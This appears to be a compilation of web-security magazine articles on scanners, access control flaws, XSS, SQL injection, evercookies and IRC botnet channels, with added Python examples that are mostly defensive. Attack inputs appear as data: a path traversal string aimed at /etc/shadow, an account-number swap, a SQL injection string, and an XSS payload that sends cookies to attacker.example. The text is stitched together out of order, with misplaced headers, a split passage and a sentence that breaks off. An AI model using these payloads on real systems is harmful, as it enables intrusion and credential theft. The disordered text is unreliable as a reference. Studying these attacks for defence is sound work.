Active scanning is more common, using a number of familiar tools. WebScarab, Burp Suite and Paros are all commonly used to do vulnerability checking for web applications. An active scanner runs attacks against the server in a very methodical and complete way. It is very noisy and can be very disruptive to operations if you run it against a production system, which is often necessary, because not everyone has the resources to operate and maintain an exact mirror of their production system as a development environment. There is another option, though, which is less noisy and makes it more difficult to notice that you are running scans against the system in question. There are legitimate reasons for scanning systems you don't control. With web attacks becoming so much more prevalent again, it may simply be self-protection to know whether a site may be vulnerable to attack, so you can make an informed decision about whether to share your information with it.
In those cases, you don't want to run a full-blown spider and active scan against those sites. It would be obvious to the site and network administrators what was going on, and while your reasons are honorable and not malicious in any way, they won't be perceived that way. It is possible that they would pursue you for your efforts, and while that pursuit may not be legally successful, it would be more of a pain than you want to handle (in many jurisdictions, actively attacking a system you are not authorized to test is itself an offence, whatever your motive). In that case, you may want to take a passive approach and use a tool that analyzes the site based on your normal interactions with it. This will be less comprehensive, of course, because a passive tool won't spider the site, so the analysis is limited to the pages that you actually visited. However, that may be acceptable for the purposes you have.
Active scanning tools generally have a graphical user interface, which may be preferable. The passive scanning tool we will be looking at, and the only one I am aware of at the time of this writing, is a command line tool, which has its value in some circumstances. Both, though, act as proxies. Requests originating from the browser are sent through these tools, just like through any network proxy. The tool then stores the information and acts on it as necessary before sending it along. That may mean simply recording the request and response as well as the URL, or it may mean doing something like intercepting
Web Testing Using Active and Passive Scanners
Web site creation has become so simple that just about anyone can do it. This doesn't mean that everyone can do it well. There are so many frameworks and tools available to make dynamic sites easy to put up quickly.
What you will learn
How to scan systems using both an active and a passive web proxy
The value of doing regular site scanning
The differences between active and passive scanning
What you should know
How to use a web browser
How to configure proxy settings in your web browser
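The passive approach described above, where the proxy only inspects what the browser already sent and received, can be illustrated with a small analyzer. The Python below is an added example, not code from the article or from any of the tools it names; the sample URL, the recorded response and the particular rule set (version-disclosing Server header, cookie flags, X-Frame-Options, password forms posting over cleartext or allowing autocomplete) are assumptions chosen for illustration.

```python
"""Passive web checks: inspect a response the browser already received.
Added example for this article; nothing here sends a request, which is the
whole point of the passive approach. Sample URL, response and the rule set
are assumptions constructed for illustration."""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _FormScanner(HTMLParser):
    """Collect each <form>: its action and whether it carries a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._current = {"action": a.get("action", ""),
                             "autocomplete": a.get("autocomplete", "").lower(),
                             "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if a.get("type", "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def parse_response(raw):
    """Split a raw HTTP response into (status line, [(header, value)], body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers, body


def passive_checks(url, raw_response):
    """Return a list of findings for one recorded request/response pair."""
    findings = []
    _status, headers, body = parse_response(raw_response)
    names = {n for n, _ in headers}
    scheme = urlsplit(url).scheme
    for name, value in headers:
        if name == "server" and re.search(r"\d", value):
            findings.append(f"Server header discloses version: {value}")
        elif name == "x-powered-by":
            findings.append(f"X-Powered-By discloses platform: {value}")
        elif name == "set-cookie":
            parts = [p.strip() for p in value.split(";")]
            cookie = parts[0].split("=", 1)[0]
            flags = {p.lower() for p in parts[1:]}
            if "httponly" not in flags:
                findings.append(f"Cookie {cookie} lacks HttpOnly")
            if scheme == "https" and "secure" not in flags:
                findings.append(f"Cookie {cookie} lacks Secure on an HTTPS response")
    if "x-frame-options" not in names:
        findings.append("No X-Frame-Options header (page can be framed)")
    scanner = _FormScanner()
    scanner.feed(body)
    for form in scanner.forms:
        target = urljoin(url, form["action"])
        if form["has_password"] and urlsplit(target).scheme != "https":
            findings.append(f"Password form posts over cleartext to {target}")
        if form["has_password"] and form["autocomplete"] != "off":
            findings.append(f"Password form allows autocomplete ({target})")
    return findings


# Constructed sample: a login page as a proxy would have recorded it.
SAMPLE_URL = "https://shop.example/login"
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.2.17\r\n"
    "Set-Cookie: PHPSESSID=abc123; Path=/\r\n"
    "Set-Cookie: pref=blue; Path=/; HttpOnly; Secure\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    '<html><body><form action="http://shop.example/do_login" method="post">'
    '<input name="u"><input type="password" name="p"></form></body></html>'
)

if __name__ == "__main__":
    for finding in passive_checks(SAMPLE_URL, SAMPLE_RESPONSE):
        print(finding)
```

In a real proxy the same function runs on every transaction as it passes, so your browsing session is the test plan: only pages you visit are examined, exactly the limitation the article describes, but nothing you do is distinguishable from ordinary use of the site.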

DEFENCE
Access control, as the name suggests, is the mechanism for determining the privileges different users have to access the contents of an application. It can also manage fine-grained read and write permissions on the files owned by a particular user. In other words, access control decides who has the authorization to use files, manipulate their contents, or visit a website. In the case of web applications, access control mechanisms give different users different levels of access to web pages and functions.
Access control, or authorization, is different from authentication, and many people confuse the two. Authentication comes first and only checks whether you are a valid user of the system or not; once you have successfully authenticated to the application, authorization determines which resources you have permission to access (Figure 1).
Where sufficient authorization checks are lacking, access controls may be abused by the logged-in user, and the impact can be catastrophic. Imagine what will happen if a normal user is able to access content meant only for a system administrator.
Issues with Improper Access Control Implementations
Improper access control handling may result in information leakage or, worse, unauthorized access to system components. Let us look at a few scenarios in which authorization checks are not performed correctly and what their impact could be:
1. Path Traversal: Path traversal normally happens because permissions are not checked properly before a file is served for download. Instead of getting the intended file, a user attempts to obtain other files for which he or she lacks permission. Such attacks can occur if an application employs relative paths (../../../
Web Applications: Access Control and Authorization Issues
This article is about the different kinds of access control mechanisms in web applications and the issues with them.
What you will learn
What access controls are and how they behave if not implemented correctly.
What you should know
Basic web-related concepts
Figure 1. Access control mechanism

Figure 2. Path traversal attack
If the application does not properly validate the input to see whether the current user is allowed to see the referenced record, then information leakage and improper disclosure of private information will occur: http://MyBank.com/profiles?profile_ID=87654321.
3. Forced Browsing: In this case a user is supposed to go through certain steps before reaching the final URL. But sometimes the user is able to bypass these checks and access the URL directly. In the worst cases, the URL can be accessed without any kind of authentication. For example, in order to get a discount code on a shopping web site you need to go through various checks like validating your
../targetfile) to serve files to users. The user can abuse this by supplying, e.g., ../../../../../../etc/shadow to access the file that contains the hashed login credentials. The following figure (Figure 2) shows how an application allows a user to download files.
If the file path is replaced with ../../../../etc/shadow, the application downloads the shadow file from the system (Figure 3), which can be cracked (Figure 4) to get valid login credentials to finally connect to the server and compromise it (Figure 5). Note that this particular file is only reachable when the web application runs with enough privilege to read it; /etc/shadow is normally readable only by root, but configuration files holding database passwords and the application's own source are usually readable by the web server account and are just as useful to an attacker.
2. Insecure Direct Object Reference: Authorities such as the Open Web Application Security Project (OWASP) list it as a separate category, but this is also a type of improper access control check. In this kind of implementation, applications use some kind of reference to display the corresponding files or pages to users; these references may be identifier tokens such as database keys or account numbers. For example, suppose a banking application shows a profile to an authenticated user on the basis of the account number:
http://MyBank.com/profiles?profile_ID=12345678.
The user makes an educated guess that one may be able to view the profiles of other users by supplying any other valid account number (for example 87654321).
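The path traversal and insecure direct object reference scenarios above both come down to the server deciding, on every request, whether the caller may have the object they named. The Python below is an added example, not code from the article; the download directory, the profile table, the admin role and the token-based indirect reference are assumptions constructed for illustration, and the example goes one step beyond the text by showing the OWASP-style indirect reference map as well as the direct check.

```python
"""Server-side authorization for two scenarios: path traversal on a file
download and an insecure direct object reference on a profile lookup.
Added example, not the article's code; the base directory, the profile
table and the admin role are constructed for illustration."""
from pathlib import Path
import secrets


class AccessDenied(Exception):
    """Raised for any request the caller is not allowed to make."""


def resolve_download(base_dir, requested):
    """Map a user-supplied name onto base_dir and refuse anything that escapes it.

    Canonicalising first means '../' sequences, absolute paths and symlinks
    are all judged by where they actually end up, not by how they look."""
    base = Path(base_dir).resolve()
    target = (base / requested).resolve()   # '/etc/shadow' joined to base stays '/etc/shadow'
    if base not in target.parents:
        raise AccessDenied(f"{requested!r} resolves outside {base}")
    return target


# Constructed stand-in for the bank's profile table; the key is the account number.
PROFILES = {
    12345678: {"owner": "alice", "name": "Alice", "balance": 1500},
    87654321: {"owner": "bob", "name": "Bob", "balance": 9000},
}


def get_profile_insecure(profile_id):
    """The vulnerable pattern: existence of the record is the only check."""
    return PROFILES[profile_id]


def get_profile(current_user, profile_id, roles=()):
    """Authorise on every request: the record must belong to the caller
    (or the caller must hold the admin role)."""
    record = PROFILES.get(profile_id)
    if record is None or (record["owner"] != current_user and "admin" not in roles):
        # One error for 'missing' and 'forbidden', so the endpoint cannot be
        # used to confirm which account numbers exist.
        raise AccessDenied("profile not available")
    return record


def indirect_references(current_user):
    """OWASP-style indirect object references: the browser gets opaque
    per-session tokens, and only the server knows which account each maps to."""
    mapping = {}
    for pid, record in PROFILES.items():
        if record["owner"] == current_user:
            mapping[secrets.token_urlsafe(16)] = pid
    return mapping


def get_profile_by_token(mapping, token):
    """Resolve a token issued by indirect_references; unknown tokens are denied."""
    if token not in mapping:
        raise AccessDenied("profile not available")
    return PROFILES[mapping[token]]


def is_denied(func, *args, **kwargs):
    """True if the call raises AccessDenied; convenient for checks and tests."""
    try:
        func(*args, **kwargs)
    except AccessDenied:
        return True
    return False


if __name__ == "__main__":
    print(resolve_download("/srv/app/files", "report.pdf"))
    print(is_denied(resolve_download, "/srv/app/files", "../../../../etc/shadow"))
    print(get_profile("alice", 12345678)["name"])
    print(is_denied(get_profile, "alice", 87654321))
```

The two checks share one principle: the decision is made server-side from the authenticated identity, never from anything the client sent, and the denial reveals nothing about whether the requested object exists.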
Figure 3. The shadow file being downloaded
DEFENCE
Web Applications: Testing and Securing Your Code
We as a society give these same web applications personal and financial information, not really thinking about how our information is being protected, or how easy it is for unauthorized retrieval.
Web application security is claimed to be a priority for many businesses, yet we never fail to read or hear about data leakage from web application vulnerabilities. Barracuda Networks was the victim of an attack on an application used to communicate with product users. This gave the attackers access to over a dozen databases, leaking employee and business partner information. Gawker Media ran into the same issue at the end of 2010, with nine of its websites compromised, including Gizmodo and Lifehacker. This attack exposed over 1 million email addresses and passwords of registered users, which were then used to spam from Twitter accounts that shared their login credentials with the Gawker accounts. The numerous attacks on Sony's servers brought a technology giant to its knees with loss of services and a drop in the market. Although at the time of this writing it has not been disclosed how Sony's PlayStation Network was breached, several of their online stores were attacked and taken down through SQL injection.
An attack on a network is not only embarrassing, but can lead to loss of profits, lengthy downtime, or significant fines. Securing your web applications isn't a difficult task if they are designed properly the first time and routinely audited. This article covers the top threats to web applications, and how you can protect against them.
Cross-Site Scripting
Businesses are gaining an edge over their competitors by having dynamic content that increases user interaction with their pages. This dynamic content changes to fit the needs and preferences of a particular user, operating system, browser settings and behavior. The generation of this dynamic content is where the security risk arises, as static content has a much smaller attack surface. The most basic attack on dynamic content is called Cross-Site Scripting, XSS for short.
The point of an XSS attack is to alter the content of the intended page to the attacker's needs by injecting arbitrary code (usually JavaScript) into a site. From there, an attacker can bypass client-side security mechanisms and act within the victim's session and access rights. The three types of XSS attack are Reflected (Non-Persistent), Persistent (Stored), and DOM-based; the example used in this article is a Reflected XSS attack.
Reflected XSS attacks are not stored on the server that hosts the content; instead the attacker crafts a URL that carries the payload, and the server echoes it back into the page when the victim requests it. These are commonly delivered by posting a link on a social networking site, or via a message or e-mail, in an attempt to phish something out of the user.
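The reflected case just described, worked through end to end: the attacker builds the link, the server echoes the parameter, and the only thing that separates a compromised page from a harmless one is output encoding. This Python is an added example, not the article's own; the search page, its parameter name, the attacker host and the payload are all constructed for illustration.

```python
"""Reflected XSS: the payload rides in a URL and the server echoes it into
the page. Added example, not the article's own; the search page, its
parameter name and the payload are constructed."""
import html
from urllib.parse import parse_qs, urlencode, urlsplit


def craft_reflected_url(base_url, payload):
    """What the attacker posts or mails: nothing is stored on the server,
    the script lives in the link itself (URL-encoded so it survives transit)."""
    return base_url + "?" + urlencode({"q": payload})


def query_param(url, name):
    """Pull one parameter out of the request URL, as the server would."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def render_search_vulnerable(query):
    """Reflects the parameter straight into HTML: whatever the link carried
    is now part of the page the victim's browser executes."""
    return f"<p>You searched for: {query}</p>"


def render_search_safe(query):
    """Output encoding for an HTML text context: <, >, &, quotes become
    entities, so the browser shows the payload instead of running it."""
    return f"<p>You searched for: {html.escape(query, quote=True)}</p>"


def handle_request(url, renderer):
    """Minimal server: take q from the URL and hand it to the page renderer."""
    return renderer(query_param(url, "q"))


def contains_script(page):
    """Crude check used here to show the difference: does a <script> tag
    survive into the response?"""
    return "<script" in page.lower()


# Constructed payload: ship the victim's cookie to a host the attacker controls.
PAYLOAD = '<script>new Image().src="http://attacker.example/c?"+document.cookie</script>'
SEARCH_URL = "http://shop.example/search"

if __name__ == "__main__":
    link = craft_reflected_url(SEARCH_URL, PAYLOAD)
    print(link)
    print(handle_request(link, render_search_vulnerable))
    print(handle_request(link, render_search_safe))
```

html.escape is the right tool only because the value lands in HTML text; a value written into an attribute, a URL or a JavaScript string needs the encoding for that context, which is why templating engines that escape by default and know the context are preferable to escaping by hand.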
Web Applications: Testing and Securing Your Code
With the high demand for applications and information, companies have made data readily and easily available. Web applications, whether to keep in touch with friends, download music, or order a new espresso machine, are used so commonly that you seldom think about how the information is presented to you.
What you will learn
A foundation for how to test and secure your web applications
What you should know
Web application development
Basic JavaScript and SQL commands
ID FRAUD EXPERT SAYS...
An overview of Web Application Security Issues
Web application (referred to as "web app") security is very much in its infancy, and some security experts (including myself) believe this is going to be a major emerging area of technology. Web apps have been around since the first CGI programs of the early 1990s, many of them written in Perl (which Larry Wall released in 1987), so they are not really that new. Nowadays web apps are more complex and are based on a client-server architecture (Hotmail and Gmail are good examples). This architecture is evolving, and we see web apps such as Google Apps acting as a word processor, storing the files and allowing you to download the file onto your PC. Facebook and the social web have also moved into web apps, hence the recently coined phrase "Web 3.0".
Web application development tool issues
How many readers understand why they need sophisticated web app vulnerability detection tools? Probably not that many! Being able to detect insecure or defective lines of code, where hackers will look to exploit, is critical in the development of a secure web app; static analysis of this kind normally runs at build time, when the code is compiled. Research suggests that vulnerability tools are not being used to improve code security, and there is an argument against them as well: web app vulnerability tools don't provide complete application awareness and can only focus on specific code modules (i.e. the UI and DB modules). It is well known that code scanners do not work well across module boundaries, and bug tracking systems are currently not, or not well, integrated with them, so web developers cannot easily detect and track core vulnerabilities or erroneous lines of code. It's clear there are quite a few issues here.
Web application programming development
Web apps are usually coded in multiple languages, using a combination of server- and client-side scripts. ASP and PHP are the most common on the server side (which is where the real hard work is done), with JavaScript and HTML at the presentation level. Responsive web apps such as Gmail (which have developed very fast) owe much to AJAX (Asynchronous JavaScript and XML), which is not a programming language but a combination of existing technologies.
AJAX is helping lead the way mainly because it allows a page running in the browser to communicate with a web server without the client reloading each page. Firefox, for example, uses the XMLHttpRequest object to achieve this, whereas older versions of Internet Explorer used the Microsoft.XMLHTTP ActiveX object (IE 7 and later also expose XMLHttpRequest). AJAX allows web developers to exchange data between client and server without the user reloading the web page.
There is a slight drawback in that the client still has to send packets of data to the server and receive the response, which client-side script then interprets and converts into Dynamic HTML to make the web page interactive. Now, let us take a look at the persistent JavaScript API threat.
Persistent JavaScript API: evercookies
The evercookie is a persistent JavaScript API which, if you value your privacy, should come with an option to remove it from a browser session; strangely, it doesn't. Most users will probably be unaware of this cookie. It is little understood outside technical and marketing circles, yet online advertisers and web app developers are using evercookies more and more.
The evercookie stores the same identifier in multiple data storage locations on your PC, so it is very difficult to remove completely. Privacy-wise, the evercookie can be deleted, but it has an uncanny habit of regenerating itself from whichever copies survive. It behaves more like spyware or malware, and you may have heard it referred to as obfuscated code: it is delivered as part of JavaScript and keeps its copies in HTTP caching mechanisms, Flash, Silverlight, HTML5 DOM storage and so on, which means the evercookie and its purpose are completely concealed from you. Is this malicious code? Probably, but it is not illegal for web app developers or marketers to use.
AJAX programming security issues
According to OWASP (https://www.owasp.org/index.php/Main_Page), AJAX does indeed have many security vulnerabilities that are still to be fully researched. As discussed above, the XMLHttpRequest object retrieves information from a web server, and the endpoints it calls are subject to the same SQL injection (SQL statement modification) on the database and XSS (injecting malicious content as HTML or JavaScript code) attacks as any other page. JavaScript (users can control JavaScript requests with a JavaScript blocker
An overview of Web
Application Security Issues
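The SQL injection risk raised in the AJAX section above is no different for an XMLHttpRequest endpoint than for a full page: the value the browser sends ends up in a query. The Python below is an added example, not the article's code; the schema, rows, endpoint and the injected string are constructed for illustration, and it shows the vulnerable lookup beside the parameterised one and the JSON response an AJAX caller would receive.

```python
"""SQL injection on an AJAX endpoint that looks up a user by name and
returns JSON. Added example, not the article's code; the schema, rows and
endpoint are constructed for illustration."""
import json
import sqlite3


def make_db():
    """In-memory stand-in for the application's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT, is_admin INTEGER)")
    conn.executemany(
        "INSERT INTO users (username, email, is_admin) VALUES (?, ?, ?)",
        [("alice", "alice@example.org", 0), ("bob", "bob@example.org", 0), ("root", "root@example.org", 1)],
    )
    return conn


def lookup_vulnerable(conn, username):
    """String concatenation: the client-supplied value becomes part of the
    SQL grammar, so quotes in it rewrite the statement."""
    sql = "SELECT username, email FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, username):
    """Parameterised query: the value is bound as data and can never
    change the statement, whatever characters it contains."""
    return conn.execute(
        "SELECT username, email FROM users WHERE username = ?", (username,)
    ).fetchall()


def ajax_endpoint(conn, username, lookup=lookup_safe):
    """What the XMLHttpRequest caller gets back: a JSON body plus the
    headers a browser needs to treat it as data rather than as a page."""
    rows = [{"username": u, "email": e} for u, e in lookup(conn, username)]
    body = json.dumps({"results": rows})
    headers = {"Content-Type": "application/json; charset=utf-8",
               "X-Content-Type-Options": "nosniff"}
    return headers, body


# Constructed attacker input: closes the string and appends an always-true clause.
INJECTION = "x' OR '1'='1"

if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, INJECTION))   # every row comes back
    print(lookup_safe(db, INJECTION))         # no such user
    print(ajax_endpoint(db, "alice")[1])
```

On the client side the JSON fields should be inserted with textContent rather than innerHTML, otherwise an attacker who can plant script in a stored field gets the XSS case mentioned in the same paragraph; the nosniff header keeps a browser from reinterpreting the JSON body as HTML.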
EMERGING THREATS
Why are there So Many Command and Control Channels Part Two
In our last conversation we were talking about Command and Control Channels, or CnCs. I was going on and on about how we really don't have that much variety in CnCs, and that we could roughly categorize them into a few categories by method:
IRC
The classics, some on non-standard ports. Some still using public IRC networks, thinking no one is watching...
Custom Hex Channels
By far the most innovation has happened here in the last couple of years. There are some sub-categories we'll discuss later as well. Lots of variety!
HTTP
Definitely the bulk of CnC channels fall into this category. It's easy to get data out of a network and blend in with the deluge of normal traffic. Many challenges here for detection, but not a great deal of extremely interesting new stuff.
Peer to Peer
Storm and the like. A great way to distribute and anonymize as well as resist takedown. Starting to wane though: very noisy, and it doesn't get you out of the corporate net easily.
Covert Channels
This is an expanding category, considering how much espionage goes on and how sophisticated the nation-state defenses have gotten. Extreme amounts of variety, but frankly less than I'd have expected by now. At least from what we know about... Can include everything from ICMP payload channels to using USB sticks to bridge air-gapped networks.
Five general categories, and we'll talk about each category and cover some examples in the next few articles here. But first, there are a few traits of a CnC channel we should keep in mind as we discuss. They have to accomplish a few general goals to be useful:
Be able to get out of a NATed network
Get through a firewall
Receive commands
Return information
Remain undetected
Allow a botherder to manage hundreds or thousands of bots at a time, as well as individuals
Relatively simple things, but challenging in practice. So today let's talk about IRC. This is by far the oldest CnC type. Back then the bot herder didn't have to worry about being undetected, or even really about firewalls. No one was watching for them, so they could operate as they pleased. So you have a group of geeks that decide to build a botnet-like thing, and they use the most familiar thing they have to control it: IRC, the original chat protocol. Bots require very little intelligence to interact with an IRC server. You connect, log in, set a nick, join a room and you're good. The bot can then just take the conversation in the room as commands and return results. The bot herder can give commands to their entire fleet at once, and not really have to do much administrative junk to make it happen.
Things got more sophisticated over time, adding password protection to rooms, bots that would require encrypted or obfuscated commands in the channel, or that would respond only to certain nicks for commands. Then they moved to non-standard ports for IRC when we suddenly got security-minded and added block rules for IRC in these new firewall things we decided we might want to try using. But overall it was a quick, easy way to run a net.
IRC is still being used. Here is an example conversation from a sample that came through our sandnet just a few days ago:
:irc.<redacted>.org NOTICE AUTH :*** Looking up your hostname...
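The move to non-standard ports described above is exactly why a port-based IRC block rule stops working; the detection has to recognise the protocol itself, and the nick and channel names that fall out of it are what you pivot on to find the rest of the herd. The Python below is an added example, not the author's sandnet tooling; the flow records, the bot nicknames, the channel and the password are constructed for illustration (the server name above remains redacted and is not used here).

```python
"""Port-independent IRC detection over captured flows: bots moved to off
ports once firewalls blocked 6667, so match the protocol, not the port.
Added example, not the author's code; flow records and bot nicknames are
constructed."""
import re

# Optional ':prefix ' then a command verb, as every IRC line is laid out.
IRC_LINE = re.compile(
    r"^(?::\S+\s+)?(NICK|USER|PASS|JOIN|PART|PRIVMSG|NOTICE|PING|PONG|MODE|TOPIC)\b", re.I)
NICK_RE = re.compile(r"^NICK\s+(\S+)", re.I)
JOIN_RE = re.compile(r"^(?::\S+\s+)?JOIN\s+:?(#\S+)", re.I)
STANDARD_IRC_PORTS = {6667, 6697}


def looks_like_irc(payload, threshold=0.5):
    """True when most CRLF-delimited lines in a TCP payload parse as IRC."""
    lines = [ln for ln in payload.split("\r\n") if ln]
    if len(lines) < 2:
        return False
    hits = sum(1 for ln in lines if IRC_LINE.match(ln))
    return hits / len(lines) >= threshold


def extract_indicators(payload):
    """Nicks and channels seen in the payload; bot fleets share a channel
    and use generated nicks, so these are what you pivot on."""
    nicks, channels = set(), set()
    for ln in payload.split("\r\n"):
        m = NICK_RE.match(ln)
        if m:
            nicks.add(m.group(1))
        m = JOIN_RE.match(ln)
        if m:
            channels.add(m.group(1))
    return {"nicks": sorted(nicks), "channels": sorted(channels)}


def flag_cnc_flows(flows):
    """One alert per flow that carries IRC, noting whether the port was
    standard; HTTP and other traffic pass silently."""
    alerts = []
    for flow in flows:
        if not looks_like_irc(flow["payload"]):
            continue
        ind = extract_indicators(flow["payload"])
        alerts.append({
            "src": flow["src"], "dst": flow["dst"], "dport": flow["dport"],
            "off_port": flow["dport"] not in STANDARD_IRC_PORTS,
            "nicks": ind["nicks"], "channels": ind["channels"],
        })
    return alerts


# Constructed flows: a classic bot on 6667, the same herd on an off port, and web traffic.
SAMPLE_FLOWS = [
    {"src": "10.0.0.5", "dst": "203.0.113.10", "dport": 6667, "payload":
        ":irc.example.org NOTICE AUTH :*** Looking up your hostname...\r\n"
        "NICK [USA|XP|482913]\r\n"
        "USER xp 0 0 :xp\r\n"
        "JOIN #botz k3y\r\n"
        ":[USA|XP|482913]!xp@10.0.0.5 JOIN :#botz\r\n"},
    {"src": "10.0.0.7", "dst": "203.0.113.10", "dport": 8080, "payload":
        "PASS k3y\r\n"
        "NICK [DEU|2K|112233]\r\n"
        "JOIN #botz k3y\r\n"
        "PRIVMSG #botz :.status\r\n"},
    {"src": "10.0.0.9", "dst": "198.51.100.20", "dport": 80, "payload":
        "GET /index.html HTTP/1.1\r\n"
        "Host: www.example.com\r\n"
        "User-Agent: Mozilla/5.0\r\n\r\n"},
]

if __name__ == "__main__":
    for alert in flag_cnc_flows(SAMPLE_FLOWS):
        print(alert)
```

Two hosts joining the same channel with machine-generated nicks of the same shape is the signature of a herd rather than a person chatting; once the channel is known, every other internal host that joins it is a bot to be pulled off the network, whatever port it used.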